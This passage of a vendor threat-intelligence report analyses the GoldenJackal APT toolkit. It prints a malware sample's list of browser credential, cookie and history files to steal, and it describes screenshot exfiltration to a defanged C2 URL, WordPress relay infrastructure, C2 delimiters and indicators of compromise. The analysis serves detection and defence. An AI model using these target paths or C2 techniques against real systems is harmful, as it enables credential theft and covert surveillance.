!important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Desktop\*.txt Documents\*.txt AppData\Local\Microsoft\Windows\WebCache\*.log AppData\Roaming\Microsoft\Windows\Cookies\*.txt AppData\Local\Google\Chrome\User Data\*\Bookmarks AppData\Local\Google\Chrome\User Data\*\Cookies AppData\Local\Google\Chrome\User Data\*\History AppData\Local\Google\Chrome\User Data\*\Login Data AppData\Local\Google\Chrome\User Data\*\Shortcuts AppData\Local\Google\Chrome\User Data\*\Web Data AppData\Roaming\Opera\Opera\*\bookmarks.adr AppData\Roaming\Opera\Opera\*\global_history.dat AppData\Roaming\Mozilla\Firefox\Profiles\*\places.sqlite AppData\Roaming\Mozilla\Firefox\Profiles\*\cookies.sqlite AppData\Roaming\Mozilla\Firefox\Profiles\*\formhistory.sqlite</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-2">2</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-4">4</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-6">6</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-8">8</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-10">10</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-12">12</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-14">14</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-15">15</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a3896987430-1"><span class="crayon-i">Desktop</span><span class="crayon-sy">\</span>*<span class="crayon-sy">.</span><span class="crayon-e">txt</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-2"><span class="crayon-i">Documents</span><span class="crayon-sy">\</span>*<span class="crayon-sy">.</span><span class="crayon-e">txt</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-3"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">WebCache</span><span class="crayon-sy">\</span>*<span class="crayon-sy">.</span><span class="crayon-e">log</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-4"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">Cookies</span><span class="crayon-sy">\</span>*<span class="crayon-sy">.</span><span class="crayon-e">txt</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-5"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Bookmarks</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-6"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Cookies</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-7"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">History</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-8"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Login </span><span class="crayon-e">Data</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-9"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Shortcuts </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-10"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Web </span><span class="crayon-e">Data</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-11"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Opera</span><span class="crayon-sy">\</span><span class="crayon-i">Opera</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-i">bookmarks</span><span class="crayon-sy">.</span><span class="crayon-e">adr</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-12"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Opera</span><span class="crayon-sy">\</span><span class="crayon-i">Opera</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-i">global_history</span><span class="crayon-sy">.</span><span class="crayon-e">dat</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-13"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Mozilla</span><span class="crayon-sy">\</span><span class="crayon-i">Firefox</span><span class="crayon-sy">\</span><span class="crayon-i">Profiles</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-i">places</span><span class="crayon-sy">.</span><span class="crayon-e">sqlite</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-14"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Mozilla</span><span class="crayon-sy">\</span><span class="crayon-i">Firefox</span><span class="crayon-sy">\</span><span class="crayon-i">Profiles</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-i">cookies</span><span class="crayon-sy">.</span><span class="crayon-e">sqlite</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-15"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Mozilla</span><span class="crayon-sy">\</span><span class="crayon-i">Firefox</span><span class="crayon-sy">\</span><span class="crayon-i">Profiles</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-i">formhistory</span><span class="crayon-sy">.</span><span class="crayon-i">sqlite</span></div></div></td> </tr> </table> </div> </div><p> The malware attempts to steal credentials stored in the victim&#8217;s browser databases, as well as other information such as cookies that could be used to gain access to web services.</p> <p>Finally, it serializes the collected information to a binary format, compresses all the data with the GZIP algorithm, and stores everything in the file specified with the first argument provided by the attacker.</p> <h2 id="jackalscreenwatcher">JackalScreenWatcher</h2> <p>This tool is used to collect screenshots of the victim&#8217;s desktop and sends the pictures to a remote, hard-coded C2 server:</p> <p style="text-align: center">hxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php</p> <p>This specific webpage was also used as a C2 for the JackalSteal component, indicating that the tools are probably part of a unique framework.</p> <p>The malware can handle some arguments that are optional and can be provided as input:</p> <ul> <li>-r resolution ratio (default 1.0)</li> <li>-i interval (default 10 seconds)</li> <li>-n specify a custom agent id. By default, this value is equal to: %Hostname%\%Username%</li> </ul> <p>The program&#8217;s primary function involves running a thread that scans all displays on the system, checking their dimensions. It then starts an infinite loop, periodically checking if the user is active on the system. Whenever the malware detects user activity, it captures a screenshot and sends it to the remote server.</p> <p>User activity is detected by monitoring the cursor&#8217;s position and checking if it has changed since the last recorded position. After uploading a screenshot, it waits for a specified interval before restarting the loop.</p> <p>The screenshots are uploaded inside an encrypted payload using HTTP Post requests.</p> <p>The encrypted payload is similar to that used by JackalSteal and contains the following information:</p> <p><code>|&lt;AES_Key,AES_IV&gt;&lt;Remote filename&gt;&lt;Screenshot&gt;|</code></p> <p>AES_Key and AES_IV are encrypted with the RSA algorithm using a key embedded in the code. The resulting payload is also compressed with the GZIP algorithm.</p> <p>The Remote filename and Screenshot data are encrypted with the AES algorithm and compressed with GZIP. The RSA key is the same as that observed in other JackalSteal components.</p> <h2 id="infrastructure">Infrastructure</h2> <p>GoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-related logic. We believe the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server.</p> <p>We don&#8217;t have any evidence of the vulnerabilities used to compromise the sites. However, we did observe that many of the websites were using obsolete versions of WordPress and some had also been defaced or infected with previously uploaded web shells, likely as a result of low-key hacktivist or cybercriminal activity. For this reason, we assess that the vulnerabilities used to breach these websites are known ones rather than 0-days.</p> <p>The remote webpage usually replies with a fake &#8220;Not Found&#8221; page. The HTTP response status code is &#8220;200&#8221;, but the HTTP body shows a &#8220;Not found&#8221; webpage.</p> <div id="crayon-67b40d94679a4143157538" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">XHTML</span></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt; &lt;html&gt;&lt;head&gt; &lt;title&gt;404 Not Found&lt;/title&gt; &lt;/head&gt;&lt;body&gt; &lt;h1&gt;Not Found&lt;/h1&gt; &lt;p&gt;The requested URL %FILE PATH% was not found on this server.&lt;/p&gt; &lt;hr&gt; &lt;address&gt;%SERVER%&lt;/address&gt; &lt;/body&gt;&lt;/html&gt;</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a4143157538-2">2</div><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a4143157538-4">4</div><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a4143157538-6">6</div><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a4143157538-8">8</div><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-9">9</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a4143157538-1"><span class="crayon-n">&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;</span><span class="crayon-i ">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a4143157538-2"><span class="crayon-r ">&lt;html&gt;</span><span class="crayon-r ">&lt;head&gt;</span></div><div class="crayon-line" id="crayon-67b40d94679a4143157538-3"><span class="crayon-r ">&lt;title&gt;</span><span class="crayon-i ">404 Not Found</span><span class="crayon-r ">&lt;/title&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a4143157538-4"><span class="crayon-r ">&lt;/head&gt;</span><span class="crayon-r ">&lt;body&gt;</span></div><div class="crayon-line" id="crayon-67b40d94679a4143157538-5"><span class="crayon-r ">&lt;h1&gt;</span><span class="crayon-i ">Not Found</span><span class="crayon-r ">&lt;/h1&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a4143157538-6"><span class="crayon-r ">&lt;p&gt;</span><span class="crayon-i ">The requested URL %FILE PATH% was not found on this server.</span><span class="crayon-r ">&lt;/p&gt;</span></div><div class="crayon-line" id="crayon-67b40d94679a4143157538-7"><span class="crayon-r ">&lt;hr&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a4143157538-8"><span class="crayon-r ">&lt;address&gt;</span><span class="crayon-i ">%SERVER%</span><span class="crayon-r ">&lt;/address&gt;</span></div><div class="crayon-line" id="crayon-67b40d94679a4143157538-9"><span class="crayon-r ">&lt;/body&gt;</span><span class="crayon-r ">&lt;/html&gt;</span></div></div></td> </tr> </table> </div> </div><p> In specific cases, the attacker provides a valid response with a list of commands. In those cases, the previous body is followed by a long list of standard Windows new line sequences – &#8220;\r\n&#8221; – and finally the previously mentioned delimiter:</p> <div id="crayon-67b40d94679a6497902964" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; margin-left: auto; margin-right: auto; clear: none; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &lt;!-- DEBUGDATA::%ENCODED_DATA% --&gt;</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a6497902964-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a6497902964-1"><span class="crayon-h">&lt;</span><span class="crayon-sy">!</span>--<span class="crayon-h"> </span><span class="crayon-i">DEBUGDATA</span><span class="crayon-sy">:</span><span class="crayon-sy">:</span><span class="crayon-sy">%</span><span class="crayon-i">ENCODED_DATA</span><span class="crayon-sy">%</span><span class="crayon-h"> </span>--<span class="crayon-h">&gt;</span></div></div></td> </tr> </table> </div> </div><p> <h2 id="victims">Victims</h2> <p>Over the years, we have observed a limited number of attacks against government and diplomatic entities in the Middle East and South Asia. We observed victims in: Afghanistan, Azerbaijan, Iran, Iraq, Pakistan and Turkey.</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22142912/GoldenJackal_APT_11.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109718" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22142912/GoldenJackal_APT_11.png" alt="Geography of victims" width="735" height="411" /></a></p> <p style="text-align: center"><strong><em>Geography of victims</em></strong></p> <h2 id="attribution">Attribution</h2> <p>We are unable to link GoldenJackal to any known actor.</p> <p>During our investigations, we observed some similarities between GoldenJackal and Turla. Specifically, we noticed a code similarity in the victim UID generation algorithm that overlaps somewhat with that used by Kazuar.</p> <p>Specifically, Kazuar gets the MD5 hash of a predefined string and then XORs it with a four-byte unique &#8220;seed&#8221; from the machine. The seed is obtained by fetching the serial number of the volume where the operating system is installed.</p> <div id="crayon-67b40d94679a7390360379" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">XHTML</span></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> public static Guid md5_plus_xor(string string_0) { byte[] bytes = BitConverter.GetBytes(parameter_class.unique_pc_identifier); byte[] array = MD5.Create().ComputeHash(get_bytes_wrapper(string_0)); for (int i = 0; i &lt; array.Length; i++) { byte[] array2 = array; int num = i; array2[num] ^= bytes[i % bytes.Length]; } return new Guid(array); }</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-2">2</div><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-4">4</div><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-6">6</div><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-8">8</div><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-10">10</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a7390360379-1">public<span class="crayon-h"> </span>static<span class="crayon-h"> </span>Guid<span class="crayon-h"> </span>md5<span class="crayon-sy">_</span>plus<span class="crayon-sy">_</span>xor<span class="crayon-sy">(</span>string<span class="crayon-h"> </span>string<span class="crayon-sy">_</span>0<span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">{</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-2"><span class="crayon-h">&nbsp;&nbsp;</span>byte<span class="crayon-sy">[</span><span class="crayon-sy">]</span><span class="crayon-h"> </span>bytes<span class="crayon-h"> </span>=<span class="crayon-h"> </span>BitConverter<span class="crayon-sy">.</span>GetBytes<span class="crayon-sy">(</span>parameter<span class="crayon-sy">_</span>class<span class="crayon-sy">.</span>unique<span class="crayon-sy">_</span>pc<span class="crayon-sy">_</span>identifier<span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line" id="crayon-67b40d94679a7390360379-3"><span class="crayon-h">&nbsp;&nbsp;</span>byte<span class="crayon-sy">[</span><span class="crayon-sy">]</span><span class="crayon-h"> </span>array<span class="crayon-h"> </span>=<span class="crayon-h"> </span>MD5<span class="crayon-sy">.</span>Create<span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span>ComputeHash<span class="crayon-sy">(</span>get<span class="crayon-sy">_</span>bytes<span class="crayon-sy">_</span>wrapper<span class="crayon-sy">(</span>string<span class="crayon-sy">_</span>0<span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-4"><span class="crayon-h"> </span>for<span class="crayon-h"> </span><span class="crayon-sy">(</span>int<span class="crayon-h"> </span>i<span class="crayon-h"> </span>=<span class="crayon-h"> </span>0<span class="crayon-sy">;</span><span class="crayon-h"> </span>i<span class="crayon-h"> </span><span class="crayon-r ">&lt; array.Length; </span>i++<span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">{</span></div><div class="crayon-line" id="crayon-67b40d94679a7390360379-5"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span>byte<span class="crayon-sy">[</span><span class="crayon-sy">]</span><span class="crayon-h"> </span>array2<span class="crayon-h"> </span>=<span class="crayon-h"> </span>array<span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-6"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span>int<span class="crayon-h"> </span>num<span class="crayon-h"> </span>=<span class="crayon-h"> </span>i<span class="crayon-sy">;</span></div><div class="crayon-line" id="crayon-67b40d94679a7390360379-7"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span>array2<span class="crayon-sy">[</span>num<span class="crayon-sy">]</span><span class="crayon-h"> </span>^=<span class="crayon-h"> </span>bytes<span class="crayon-sy">[</span>i<span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-h"> </span>bytes<span class="crayon-sy">.</span>Length<span class="crayon-sy">]</span><span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-8"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-sy">}</span></div><div class="crayon-line" id="crayon-67b40d94679a7390360379-9"><span class="crayon-h">&nbsp;&nbsp;</span>return<span class="crayon-h"> </span>new<span class="crayon-h"> </span>Guid<span class="crayon-sy">(</span>array<span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-10"><span class="crayon-sy">}</span></div></div></td> </tr> </table> </div> </div><p> JackalControl uses an MD5+SHIFT algorithm. It collects a set of information from the machine, including the serial number of the volume where the operating system is installed, to generate a unique seed with the MD5 algorithm. Then it uses the resulting byte array, summing every two consecutive bytes from the resulting MD5 hash and placing the resulting bytes (modulus 256) as the sequence that constructs the final BOT_ID.</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109712" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png" alt="Code snippet used to generate the BOT_ID" width="591" height="127" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png 591w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05-300x64.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05-370x80.png 370w" sizes="auto, (max-width: 591px) 100vw, 591px" /></a></p> <p style="text-align: center"><strong><em>Code snippet used to generate the BOT_ID</em></strong></p> <p>Moreover, the use of tools developed in .NET and of compromised WordPress websites as C2 is a common Turla TTP.</p> <p>Last but not least, the groups share an interest in the same targets, and in one specific case we observed that a victim machine was infected with a Turla artifact two months before the GoldenJackal infection.</p> <p>Despite these similarities, we assessed with low confidence that there is a connection between GoldenJackal and Turla, since neither of these is unique to either threat actor. The use of compromised WordPress websites is not a unique TTP. This technique was also observed in activity by other groups such as BlackShadow, another APT active in the Middle East that uses .NET malware. The code similarities are related to a single function in a .NET program that could be easily copied with a decompiler. It is possible that GoldenJackal used that algorithm as a false flag. Another hypothesis is that the developers behind JackalControl were inspired by Turla and decided to replicate the UID generation algorithm. Finally, the shared interest in the same targets is easily explained by the fact that the victims are high-profile targets that could be considered interesting by different actors.</p> <h2 id="conclusions">Conclusions</h2> <p>GoldenJackal is an interesting APT actor that tries to keep a low profile. Despite its long-term activities, which are believed to have started in June 2019, this group and the related samples are still generally unknown.</p> <p>The group is probably trying to reduce its visibility by limiting the number of victims. According to our telemetry, the number of targets is very low and most of them were related to government or diplomatic entities. Moreover, some of the samples were deployed only on systems that were not protected by Kaspersky during the infection phase. This may indicate that the actor is trying to protect some of its tools and avoid specific security solutions.</p> <p>Their toolkit seems to be under development – the number of variants shows that they are still investing in it. The latest malware, JackalWorm, appeared in the second half of 2022 and appears to still be in the testing phase. This tool was unexpected because in previous years the attacks were limited to a small group of high-profile entities, and a tool like JackalWorm is probably difficult to bind and can easily get out of control.</p> <p>More information about GoldenJackal, including IoCs and YARA rules, are available to customers of the Kaspersky Intelligence Reporting Service. Contact: <a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener">intelreports@kaspersky.com</a>.</p> <h2 id="indicators-of-compromise">Indicators of compromise</h2> <h3 id="md5-hashes">MD5 hashes</h3> <p><strong>JackalControl</strong><br /> <a href="https://opentip.kaspersky.com/5ed498f9ad6e74442b9b6fe289d9feb3/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5ed498f9ad6e74442b9b6fe289d9feb3</a><br /> <a href="https://opentip.kaspersky.com/a5ad15a9115a60f15b7796bc717a471d/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">a5ad15a9115a60f15b7796bc717a471d</a><br /> <a href="https://opentip.kaspersky.com/c6e5c8bd7c066008178bc1fb19437763/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">c6e5c8bd7c066008178bc1fb19437763</a><br /> <a 